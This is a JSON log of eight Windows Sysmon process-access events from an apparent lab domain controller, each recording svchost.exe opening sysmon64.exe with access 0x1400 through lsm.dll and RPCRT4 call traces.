{"EventTime":"2020-08-01 08:04:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6806,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:42.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:42.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6807,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:42.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:42.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6808,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:42.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:42.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6809,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:42.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:42.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6810,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:42.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:42.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6811,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:42.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:42.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6812,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:42.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:42.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6813,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:42.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:42.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
